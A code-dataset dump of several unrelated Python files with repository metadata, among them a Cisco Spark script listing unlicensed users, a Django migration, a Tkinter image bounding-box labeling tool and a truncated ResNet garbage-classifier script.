aa3ac1974fafdcc4d0ecbbb8b81994e2958b1715 | 96e29b0815de8a774fe15aefbfedcfb4d4a78f01 | /FreeUsers.py | 8de8965739d9e9ad2d8516fc090b3a9dff4f92f6 | [] | no_license | gj0nyg/Spark-Tools | 23bdebc0220d4f9db850f6b5834e114fc56b18e5 | d0163e41b4f1e3bfa6cd2609445aeddbbde68325 | refs/heads/master | 2021-06-30T02:19:41.869237 | 2017-09-15T12:17:53 | 2017-09-15T12:17:53 | 103,482,445 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,915 | py | #!/usr/local/bin/python3
# Code borrows heavily from Cisco Devnet lessons
from ciscosparkapi import CiscoSparkAPI, SparkApiError
import os
import sys
if __name__ == '__main__':
# Command line arguments parsing
from argparse import ArgumentParser
parser = ArgumentParser("ConvertUsers.py")
parser.add_argument("-t", "--token", help="[optional] your admin access token. Alternatively, you can use the SPARK_ACCESS_TOKEN env variable", required=False)
args = parser.parse_args()
access_token = args.token
# Check access token
spark_access_token = os.environ.get("SPARK_ACCESS_TOKEN")
token = access_token if access_token else spark_access_token
if not token:
error_message = "You must provide a Cisco Spark API access token to " \
"interact with the Cisco Spark APIs, either via " \
"a SPARK_ACCESS_TOKEN environment variable " \
"or via the -t command line argument."
print(error_message)
sys.exit(2)
try:
FreeUser=[]
api = CiscoSparkAPI(access_token=token)
users=api.people.list()
for user in users:
userDetails=api.people.get(personId=user.id)
if userDetails.licenses == []:
FreeUser.append(userDetails.emails[0])
print (userDetails.emails[0])
# print(FreeUser)
except SparkApiError as e:
print("failed with statusCode: %d" % e.response_code)
if e.response_code == 404:
print ("user is invalid")
elif e.response_code == 400:
print ("the request was invalid")
elif e.response_code == 401:
print ("please check the Cisco Spark token is correct...")
| [
"[email protected]"
] | |
4d65297c73e965cf8f0fa945c1dd72e7c6af914c | 0b8670d95816cde1ceaa2e87c5a782c50073fc64 | /NLP Senti_analysis/程序源代码/Train/Preprocess/process.py | d064bd6f53f91b6e1c961e3c551d95913e7e5b61 | [] | no_license | joyjiuyi/UCAS_NLP-1 | fd047c6e42a8d3bb7ced5922f8daf72774df530f | 23fe692bdfce3706933425c501ea742b7d073077 | refs/heads/master | 2022-05-06T03:30:03.204529 | 2018-11-24T06:11:24 | 2018-11-24T06:11:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 607 | py | #训练集\验证集划分
import sys
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
if __name__ == '__main__':
df = pd.read_csv('data.csv')
y = df.iloc[:,1]
x = df.iloc[:,2:]
x_train, x_test, y_train, y_test = train_test_split(x, y, random_state=42, train_size=0.95)
xtest = pd.DataFrame(x_test)
ytest = pd.DataFrame(y_test)
test = pd.concat([ytest,xtest],axis = 1)
test.to_csv('test.csv')
xtrain = pd.DataFrame(x_train)
ytrain = pd.DataFrame(y_train)
train = pd.concat([ytrain,xtrain],axis=1)
train.to_csv('train.csv')
| [
"[email protected]"
] | |
31e1e3bd3ba2ce4e49a925c97fabf5020e9c43d7 | c875692c864debde738215a0d08872a3ac3d5b92 | /pace_statistic.py | 2909c3124567e14bacd72f470237850892469e16 | [] | no_license | camelop/naive_poem_writer | 4f94ae17f88f39f08ac0db53bd4a55ae53b07bf4 | 9ecbfdf31804b044960962e3a8c4e4fffc3bbca1 | refs/heads/master | 2021-05-15T12:57:16.961046 | 2017-10-26T16:56:07 | 2017-10-26T16:56:10 | 108,439,812 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,355 | py | import pickle
from poem import Poem
with open('poem_list.data', 'rb') as f:
poem_list = pickle.load(f)
pace_s = {}
for p in poem_list:
pace_nw = str(p.pace())
if pace_nw in pace_s:
pace_s[pace_nw].append(p)
else:
pace_s[pace_nw] = [p]
for index, pace in enumerate(sorted(pace_s.items(), key=lambda f: len(f[1]), reverse=True)):
if index > 4:
break
# print("Pace: ", pace[0], "\t# ", len(pace[1]))
p_5_8 = pace_s[str((5, 5, 5, 5, 5, 5, 5, 5))]
f_5_8 = {}
c_5_8 = {}
for p in p_5_8:
for line in p.content:
for i in range(4):
word = line[i] + line[i + 1]
if word in f_5_8:
f_5_8[word] += 1
else:
f_5_8[word] = 1
for c in line:
if c in c_5_8:
c_5_8[c] += 1
else:
c_5_8[c] = 1
p_7 = pace_s[str((7, 7, 7, 7))] + pace_s[str((7, 7, 7, 7, 7, 7, 7, 7))]
f_7 = {}
c_7 = {}
for p in p_7:
for line in p.content:
for i in range(6):
word = line[i] + line[i + 1]
if word in f_7:
f_7[word] += 1
else:
f_7[word] = 1
for c in line:
if c in c_7:
c_7[c] += 1
else:
c_7[c] = 1
'''
for i in range(1000, 1005):
print(p_5_8[i])
'''
| [
"[email protected]"
] | |
6487119fd016b50af8b9e741625a98c8853f21ed | 0a303585b67defefb8df983e8d5395815c2ee0b2 | /bin/pip | 8e43107fe3d24cee92c5efbeae0e3731c8179197 | [] | no_license | wangqian121/python3-learn | 83c87d62887552dbbe4c41ddc891ff1a863da35b | c8c83ebdd324501c4deeb2026c9ee1f058e1bf64 | refs/heads/master | 2020-12-24T04:44:27.902787 | 2020-05-15T09:56:44 | 2020-05-15T09:56:44 | 237,384,543 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 384 | #!/Users/wangqian/untitled/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip')()
)
| [
"[email protected]"
] | ||
74078e9e213ca05dd92ef137c041b24c9432e58a | 45c539b7aefbeba43aa1623f53029325b0f8c325 | /kcdc3/apps/classes/migrations/0016_auto__add_field_event_status__add_field_event_featured__add_field_even.py | f3847e8d1fd3dfec5631ec7e4bdcc54b3facd065 | [
"MIT"
] | permissive | knowledgecommonsdc/kcdc3 | f855fd07861ac30b2e0493ff6b788e6140e6df52 | 573b836b052081c0e4137076574fc987535e1aa8 | refs/heads/master | 2021-12-12T02:43:14.814991 | 2017-10-04T14:59:22 | 2017-10-04T14:59:22 | 4,991,118 | 3 | 3 | MIT | 2021-12-02T17:56:48 | 2012-07-11T15:42:11 | Python | UTF-8 | Python | false | false | 14,415 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Event.status'
db.add_column('classes_event', 'status',
self.gf('django.db.models.fields.CharField')(default='PUBLISHED', max_length=9),
keep_default=False)
# Adding field 'Event.featured'
db.add_column('classes_event', 'featured',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
# Adding field 'Event.additional_dates_text'
db.add_column('classes_event', 'additional_dates_text',
self.gf('django.db.models.fields.TextField')(default='', blank=True),
keep_default=False)
# Adding field 'Event.location_name'
db.add_column('classes_event', 'location_name',
self.gf('django.db.models.fields.TextField')(default='', max_length=100, blank=True),
keep_default=False)
# Adding field 'Event.location_address1'
db.add_column('classes_event', 'location_address1',
self.gf('django.db.models.fields.TextField')(default='', max_length=60, blank=True),
keep_default=False)
# Adding field 'Event.location_address2'
db.add_column('classes_event', 'location_address2',
self.gf('django.db.models.fields.TextField')(default='', max_length=60, blank=True),
keep_default=False)
# Adding field 'Event.location_city'
db.add_column('classes_event', 'location_city',
self.gf('django.db.models.fields.TextField')(default='Washington', max_length=60, blank=True),
keep_default=False)
# Adding field 'Event.location_state'
db.add_column('classes_event', 'location_state',
self.gf('django.db.models.fields.TextField')(default='DC', max_length=2, blank=True),
keep_default=False)
# Adding field 'Event.location_zip'
db.add_column('classes_event', 'location_zip',
self.gf('django.db.models.fields.TextField')(default='', max_length=5, blank=True),
keep_default=False)
# Adding field 'Event.location_show_exact'
db.add_column('classes_event', 'location_show_exact',
self.gf('django.db.models.fields.BooleanField')(default=True),
keep_default=False)
# Adding field 'Event.thumbnail'
db.add_column('classes_event', 'thumbnail',
self.gf('django.db.models.fields.files.ImageField')(max_length=100, null=True, blank=True),
keep_default=False)
# Adding field 'Event.main_image'
db.add_column('classes_event', 'main_image',
self.gf('django.db.models.fields.files.ImageField')(max_length=100, null=True, blank=True),
keep_default=False)
# Adding field 'Event.email_welcome_text'
db.add_column('classes_event', 'email_welcome_text',
self.gf('django.db.models.fields.TextField')(default='', blank=True),
keep_default=False)
# Adding field 'Event.email_reminder'
db.add_column('classes_event', 'email_reminder',
self.gf('django.db.models.fields.BooleanField')(default=True),
keep_default=False)
# Adding field 'Event.email_reminder_text'
db.add_column('classes_event', 'email_reminder_text',
self.gf('django.db.models.fields.TextField')(default='', blank=True),
keep_default=False)
# Adding field 'Event.documentation'
db.add_column('classes_event', 'documentation',
self.gf('django.db.models.fields.TextField')(default='', blank=True),
keep_default=False)
# Adding M2M table for field facilitators on 'Event'
db.create_table('classes_event_facilitators', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('event', models.ForeignKey(orm['classes.event'], null=False)),
('user', models.ForeignKey(orm['auth.user'], null=False))
))
db.create_unique('classes_event_facilitators', ['event_id', 'user_id'])
# Changing field 'Event.location_description'
db.alter_column('classes_event', 'location_description', self.gf('django.db.models.fields.TextField')())
def backwards(self, orm):
# Deleting field 'Event.status'
db.delete_column('classes_event', 'status')
# Deleting field 'Event.featured'
db.delete_column('classes_event', 'featured')
# Deleting field 'Event.additional_dates_text'
db.delete_column('classes_event', 'additional_dates_text')
# Deleting field 'Event.location_name'
db.delete_column('classes_event', 'location_name')
# Deleting field 'Event.location_address1'
db.delete_column('classes_event', 'location_address1')
# Deleting field 'Event.location_address2'
db.delete_column('classes_event', 'location_address2')
# Deleting field 'Event.location_city'
db.delete_column('classes_event', 'location_city')
# Deleting field 'Event.location_state'
db.delete_column('classes_event', 'location_state')
# Deleting field 'Event.location_zip'
db.delete_column('classes_event', 'location_zip')
# Deleting field 'Event.location_show_exact'
db.delete_column('classes_event', 'location_show_exact')
# Deleting field 'Event.thumbnail'
db.delete_column('classes_event', 'thumbnail')
# Deleting field 'Event.main_image'
db.delete_column('classes_event', 'main_image')
# Deleting field 'Event.email_welcome_text'
db.delete_column('classes_event', 'email_welcome_text')
# Deleting field 'Event.email_reminder'
db.delete_column('classes_event', 'email_reminder')
# Deleting field 'Event.email_reminder_text'
db.delete_column('classes_event', 'email_reminder_text')
# Deleting field 'Event.documentation'
db.delete_column('classes_event', 'documentation')
# Removing M2M table for field facilitators on 'Event'
db.delete_table('classes_event_facilitators')
# Changing field 'Event.location_description'
db.alter_column('classes_event', 'location_description', self.gf('django.db.models.fields.TextField')(max_length=200))
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'classes.event': {
'Meta': {'ordering': "['date']", 'object_name': 'Event'},
'additional_dates_text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'documentation': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'email_reminder': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'email_reminder_text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'email_welcome_text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'facilitators': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'facilitators'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['auth.User']"}),
'featured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location_address1': ('django.db.models.fields.TextField', [], {'max_length': '60', 'blank': 'True'}),
'location_address2': ('django.db.models.fields.TextField', [], {'max_length': '60', 'blank': 'True'}),
'location_city': ('django.db.models.fields.TextField', [], {'default': "'Washington'", 'max_length': '60', 'blank': 'True'}),
'location_description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'location_name': ('django.db.models.fields.TextField', [], {'max_length': '100', 'blank': 'True'}),
'location_show_exact': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'location_state': ('django.db.models.fields.TextField', [], {'default': "'DC'", 'max_length': '2', 'blank': 'True'}),
'location_zip': ('django.db.models.fields.TextField', [], {'max_length': '5', 'blank': 'True'}),
'main_image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'max_students': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'registration_status': ('django.db.models.fields.CharField', [], {'default': "'AUTO'", 'max_length': '7'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'PUBLISHED'", 'max_length': '9'}),
'students': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'students'", 'to': "orm['auth.User']", 'through': "orm['classes.Registration']", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'summary': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'teachers': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'teachers'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['auth.User']"}),
'thumbnail': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'waitlist_status': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'classes.registration': {
'Meta': {'ordering': "['date_registered']", 'object_name': 'Registration'},
'attended': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'cancelled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'date_cancelled': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_registered': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'event': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['classes.Event']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'student': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'waitlist': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['classes'] | [
"[email protected]"
] | |
be1283b73ee741d767063e871b3ee06309038aa2 | 0fc2f0277c68758b5da261dab12cf45b32d45f0b | /main.py | e0e11198ee497cf87f4533922c7a607ad5f18277 | [] | no_license | sysadminamit/Bbox-Label-Tool-For-Multi-Class | af1a2c4792ba28cb6647a9100488fd06177e1cb0 | 05106fceb9d1d2c8d775fb4edb2e84e45aeb90a1 | refs/heads/master | 2020-04-28T18:20:06.922178 | 2019-03-13T18:19:47 | 2019-03-13T18:19:47 | 175,475,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,297 | py | from tkinter import *
from tkinter import filedialog
from tkinter import messagebox
from tkinter import ttk
from PIL import Image, ImageTk
import os
import glob
import random
# colors for the bboxes
COLORS = ['red', 'blue','pink', 'cyan', 'green', 'black']
# image sizes for the examples
SIZE = 256, 256
class LabelTool():
def __init__(self, master):
# set up the main frame
self.parent = master
self.parent.title("LabelTool")
self.frame = Frame(self.parent)
self.frame.pack(fill=BOTH, expand=1)
self.parent.resizable(width = FALSE, height = FALSE)
# initialize global state
self.imageDir = ''
self.imageList= []
self.egDir = ''
self.egList = []
self.outDir = ''
self.cur = 0
self.total = 0
self.category = 0
self.imagename = ''
self.labelfilename = ''
self.tkimg = None
self.currentLabelclass = ''
self.cla_can_temp = []
self.classcandidate_filename = 'class.txt'
# initialize mouse state
self.STATE = {}
self.STATE['click'] = 0
self.STATE['x'], self.STATE['y'] = 0, 0
# reference to bbox
self.bboxIdList = []
self.bboxId = None
self.bboxList = []
self.hl = None
self.vl = None
# ----------------- GUI stuff ---------------------
# dir entry & load
# input image dir button
self.srcDirBtn = Button(self.frame, text="Image input folder", command=self.selectSrcDir)
self.srcDirBtn.grid(row=0, column=0)
# input image dir entry
self.svSourcePath = StringVar()
self.entrySrc = Entry(self.frame, textvariable=self.svSourcePath)
self.entrySrc.grid(row=0, column=1, sticky=W+E)
self.svSourcePath.set(os.getcwd())
# load button
self.ldBtn = Button(self.frame, text="Load Dir", command=self.loadDir)
self.ldBtn.grid(row=0, column=2, rowspan=2, columnspan=2, padx=2, pady=2, ipadx=5, ipady=5)
# label file save dir button
self.desDirBtn = Button(self.frame, text="Label output folder", command=self.selectDesDir)
self.desDirBtn.grid(row=1, column=0)
# label file save dir entry
self.svDestinationPath = StringVar()
self.entryDes = Entry(self.frame, textvariable=self.svDestinationPath)
self.entryDes.grid(row=1, column=1, sticky=W+E)
self.svDestinationPath.set(os.path.join(os.getcwd(),"Labels"))
# main panel for labeling
self.mainPanel = Canvas(self.frame, cursor='tcross')
self.mainPanel.bind("<Button-1>", self.mouseClick)
self.mainPanel.bind("<Motion>", self.mouseMove)
self.parent.bind("<Escape>", self.cancelBBox) # press <Espace> to cancel current bbox
self.parent.bind("s", self.cancelBBox)
self.parent.bind("p", self.prevImage) # press 'p' to go backforward
self.parent.bind("n", self.nextImage) # press 'n' to go forward
self.mainPanel.grid(row = 2, column = 1, rowspan = 4, sticky = W+N)
# choose class
self.classname = StringVar()
self.classcandidate = ttk.Combobox(self.frame, state='readonly', textvariable=self.classname)
self.classcandidate.grid(row=2, column=2)
if os.path.exists(self.classcandidate_filename):
with open(self.classcandidate_filename) as cf:
for line in cf.readlines():
self.cla_can_temp.append(line.strip('\n'))
self.classcandidate['values'] = self.cla_can_temp
self.classcandidate.current(0)
self.currentLabelclass = self.classcandidate.get()
self.btnclass = Button(self.frame, text='ComfirmClass', command=self.setClass)
self.btnclass.grid(row=2, column=3, sticky=W+E)
# showing bbox info & delete bbox
self.lb1 = Label(self.frame, text = 'Bounding boxes:')
self.lb1.grid(row = 3, column = 2, sticky = W+N)
self.listbox = Listbox(self.frame, width = 22, height = 12)
self.listbox.grid(row = 4, column = 2, sticky = N+S)
self.btnDel = Button(self.frame, text = 'Delete', command = self.delBBox)
self.btnDel.grid(row = 4, column = 3, sticky = W+E+N)
self.btnClear = Button(self.frame, text = 'ClearAll', command = self.clearBBox)
self.btnClear.grid(row = 4, column = 3, sticky = W+E+S)
# control panel for image navigation
self.ctrPanel = Frame(self.frame)
self.ctrPanel.grid(row = 6, column = 1, columnspan = 2, sticky = W+E)
self.prevBtn = Button(self.ctrPanel, text='<< Prev', width = 10, command = self.prevImage)
self.prevBtn.pack(side = LEFT, padx = 5, pady = 3)
self.nextBtn = Button(self.ctrPanel, text='Next >>', width = 10, command = self.nextImage)
self.nextBtn.pack(side = LEFT, padx = 5, pady = 3)
self.progLabel = Label(self.ctrPanel, text = "Progress: / ")
self.progLabel.pack(side = LEFT, padx = 5)
self.tmpLabel = Label(self.ctrPanel, text = "Go to Image No.")
self.tmpLabel.pack(side = LEFT, padx = 5)
self.idxEntry = Entry(self.ctrPanel, width = 5)
self.idxEntry.pack(side = LEFT)
self.goBtn = Button(self.ctrPanel, text = 'Go', command = self.gotoImage)
self.goBtn.pack(side = LEFT)
# example pannel for illustration
self.egPanel = Frame(self.frame, border = 10)
self.egPanel.grid(row = 3, column = 0, rowspan = 5, sticky = N)
self.tmpLabel2 = Label(self.egPanel, text = "Examples:")
self.tmpLabel2.pack(side = TOP, pady = 5)
self.egLabels = []
for i in range(3):
self.egLabels.append(Label(self.egPanel))
self.egLabels[-1].pack(side = TOP)
# display mouse position
self.disp = Label(self.ctrPanel, text='')
self.disp.pack(side = RIGHT)
self.frame.columnconfigure(1, weight = 1)
self.frame.rowconfigure(4, weight = 1)
def selectSrcDir(self):
path = filedialog.askdirectory(title="Select image source folder", initialdir=self.svSourcePath.get())
self.svSourcePath.set(path)
return
def selectDesDir(self):
path = filedialog.askdirectory(title="Select label output folder", initialdir=self.svDestinationPath.get())
self.svDestinationPath.set(path)
return
def loadDir(self):
self.parent.focus()
# get image list
#self.imageDir = os.path.join(r'./Images', '%03d' %(self.category))
self.imageDir = self.svSourcePath.get()
if not os.path.isdir(self.imageDir):
messagebox.showerror("Error!", message = "The specified dir doesn't exist!")
return
extlist = ["*.JPEG", "*.jpeg", "*JPG", "*.jpg", "*.PNG", "*.png", "*.BMP", "*.bmp"]
for e in extlist:
filelist = glob.glob(os.path.join(self.imageDir, e))
self.imageList.extend(filelist)
#self.imageList = glob.glob(os.path.join(self.imageDir, '*.JPEG'))
if len(self.imageList) == 0:
print('No .JPEG images found in the specified dir!')
return
# default to the 1st image in the collection
self.cur = 1
self.total = len(self.imageList)
# set up output dir
#self.outDir = os.path.join(r'./Labels', '%03d' %(self.category))
self.outDir = self.svDestinationPath.get()
if not os.path.exists(self.outDir):
os.mkdir(self.outDir)
# load example bboxes
#self.egDir = os.path.join(r'./Examples', '%03d' %(self.category))
self.egDir = os.path.join(os.getcwd(), "Examples/001")
if not os.path.exists(self.egDir):
return
filelist = glob.glob(os.path.join(self.egDir, '*.JPEG'))
self.tmp = []
self.egList = []
random.shuffle(filelist)
for (i, f) in enumerate(filelist):
if i == 1:
break
im = Image.open(f)
r = min(SIZE[0] / im.size[0], SIZE[1] / im.size[1])
new_size = int(r * im.size[0]), int(r * im.size[1])
self.tmp.append(im.resize(new_size, Image.ANTIALIAS))
self.egList.append(ImageTk.PhotoImage(self.tmp[-1]))
self.egLabels[i].config(image = self.egList[-1], width = SIZE[0], height = SIZE[1])
self.loadImage()
print('%d images loaded from %s' %(self.total, self.imageDir))
def loadImage(self):
# load image
imagepath = self.imageList[self.cur - 1]
self.img = Image.open(imagepath)
size = self.img.size
self.factor = max(size[0]/1000, size[1]/1000., 1.)
self.img = self.img.resize((int(size[0]/self.factor), int(size[1]/self.factor)))
self.tkimg = ImageTk.PhotoImage(self.img)
self.mainPanel.config(width = max(self.tkimg.width(), 400), height = max(self.tkimg.height(), 400))
self.mainPanel.create_image(0, 0, image = self.tkimg, anchor=NW)
self.progLabel.config(text = "%04d/%04d" %(self.cur, self.total))
# load labels
self.clearBBox()
#self.imagename = os.path.split(imagepath)[-1].split('.')[0]
fullfilename = os.path.basename(imagepath)
self.imagename, _ = os.path.splitext(fullfilename)
labelname = self.imagename + '.txt'
self.labelfilename = os.path.join(self.outDir, labelname)
bbox_cnt = 0
if os.path.exists(self.labelfilename):
with open(self.labelfilename) as f:
for (i, line) in enumerate(f):
if i == 0:
bbox_cnt = int(line.strip())
continue
#tmp = [int(t.strip()) for t in line.split()]
tmp = line.split()
tmp[0] = int(int(tmp[0])/self.factor)
tmp[1] = int(int(tmp[1])/self.factor)
tmp[2] = int(int(tmp[2])/self.factor)
tmp[3] = int(int(tmp[3])/self.factor)
self.bboxList.append(tuple(tmp))
color_index = (len(self.bboxList)-1) % len(COLORS)
tmpId = self.mainPanel.create_rectangle(tmp[0], tmp[1], \
tmp[2], tmp[3], \
width = 2, \
outline = COLORS[color_index])
#outline = COLORS[(len(self.bboxList)-1) % len(COLORS)])
self.bboxIdList.append(tmpId)
self.listbox.insert(END, '%s : (%d, %d) -> (%d, %d)' %(tmp[4], tmp[0], tmp[1], tmp[2], tmp[3]))
self.listbox.itemconfig(len(self.bboxIdList) - 1, fg = COLORS[color_index])
#self.listbox.itemconfig(len(self.bboxIdList) - 1, fg = COLORS[(len(self.bboxIdList) - 1) % len(COLORS)])
def saveImage(self):
if self.labelfilename == '':
return
with open(self.labelfilename, 'w') as f:
f.write('%d\n' %len(self.bboxList))
for bbox in self.bboxList:
f.write("{} {} {} {} {}\n".format(int(int(bbox[0])*self.factor),
int(int(bbox[1])*self.factor),
int(int(bbox[2])*self.factor),
int(int(bbox[3])*self.factor), bbox[4]))
#f.write(' '.join(map(str, bbox)) + '\n')
print('Image No. %d saved' %(self.cur))
def mouseClick(self, event):
if self.STATE['click'] == 0:
self.STATE['x'], self.STATE['y'] = event.x, event.y
else:
x1, x2 = min(self.STATE['x'], event.x), max(self.STATE['x'], event.x)
y1, y2 = min(self.STATE['y'], event.y), max(self.STATE['y'], event.y)
self.bboxList.append((x1, y1, x2, y2, self.currentLabelclass))
self.bboxIdList.append(self.bboxId)
self.bboxId = None
self.listbox.insert(END, '%s : (%d, %d) -> (%d, %d)' %(self.currentLabelclass, x1, y1, x2, y2))
self.listbox.itemconfig(len(self.bboxIdList) - 1, fg = COLORS[(len(self.bboxIdList) - 1) % len(COLORS)])
self.STATE['click'] = 1 - self.STATE['click']
def mouseMove(self, event):
self.disp.config(text = 'x: %d, y: %d' %(event.x, event.y))
if self.tkimg:
if self.hl:
self.mainPanel.delete(self.hl)
self.hl = self.mainPanel.create_line(0, event.y, self.tkimg.width(), event.y, width = 2)
if self.vl:
self.mainPanel.delete(self.vl)
self.vl = self.mainPanel.create_line(event.x, 0, event.x, self.tkimg.height(), width = 2)
if 1 == self.STATE['click']:
if self.bboxId:
self.mainPanel.delete(self.bboxId)
COLOR_INDEX = len(self.bboxIdList) % len(COLORS)
self.bboxId = self.mainPanel.create_rectangle(self.STATE['x'], self.STATE['y'], \
event.x, event.y, \
width = 2, \
outline = COLORS[len(self.bboxList) % len(COLORS)])
def cancelBBox(self, event):
if 1 == self.STATE['click']:
if self.bboxId:
self.mainPanel.delete(self.bboxId)
self.bboxId = None
self.STATE['click'] = 0
def delBBox(self):
sel = self.listbox.curselection()
if len(sel) != 1 :
return
idx = int(sel[0])
self.mainPanel.delete(self.bboxIdList[idx])
self.bboxIdList.pop(idx)
self.bboxList.pop(idx)
self.listbox.delete(idx)
def clearBBox(self):
for idx in range(len(self.bboxIdList)):
self.mainPanel.delete(self.bboxIdList[idx])
self.listbox.delete(0, len(self.bboxList))
self.bboxIdList = []
self.bboxList = []
def prevImage(self, event = None):
self.saveImage()
if self.cur > 1:
self.cur -= 1
self.loadImage()
def nextImage(self, event = None):
self.saveImage()
if self.cur < self.total:
self.cur += 1
self.loadImage()
def gotoImage(self):
idx = int(self.idxEntry.get())
if 1 <= idx and idx <= self.total:
self.saveImage()
self.cur = idx
self.loadImage()
def setClass(self):
self.currentLabelclass = self.classcandidate.get()
print('set label class to : %s' % self.currentLabelclass)
if __name__ == '__main__':
root = Tk()
tool = LabelTool(root)
root.resizable(width = True, height = True)
root.mainloop()
| [
"[email protected]"
] | |
de5110ecef9c1e5ac39b92c1b6ed363b2bcedf96 | 91644491699f21add528fbf27753845086b1477f | /hafta4/GarbageTest/GarbageResNet.py | be1c25b7096d64a9c8ac4f269070c364a89fd006 | [] | no_license | SerhatTurann/TezCalismalari | 6ec3eb3c4d827972d2939bde467f7903e9695719 | cc182d05df6fc49ddf83cd2335c233c77673193a | refs/heads/master | 2023-05-10T08:53:07.062066 | 2021-06-16T01:43:32 | 2021-06-16T01:43:32 | 349,109,142 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,411 | py | import cv2 #Görüntü işleme kütüphanesi.
import numpy as np #matris işlemleri için kullanılır.
import Tools #Label işlemleri için kendi yazdığımız modül
#Modeli yüklemek ve giriş görüntüsünü hazırlamak için gerekli kütüphaneler.
from tensorflow.keras.models import load_model
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.applications.resnet50 import preprocess_input
#Model yüklenir ve etiket işlemleri yapılır.
model = load_model('models\model_resnet50_10-0.82.h5')
labels, lb = Tools.labels()
